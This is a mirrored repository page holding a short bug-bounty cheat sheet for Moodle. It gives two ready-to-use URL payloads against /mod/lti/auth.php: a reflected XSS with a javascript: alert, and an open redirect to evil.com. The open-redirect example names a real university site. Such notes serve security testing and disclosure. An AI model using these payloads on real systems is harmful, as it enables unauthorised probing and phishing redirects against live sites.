ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f9466632b0
AllAboutBugBounty/Technologies/Moodle.md
Muhammad Daffa 338475aee1 Major Update, adding some tips
2021-07-21 22:38:57 +07:00

12 lines
312 B
Markdown
Raw Blame History

# Moodle
1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
```
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
```
2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
```
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
```
Reference in New Issue View Git Blame Copy Permalink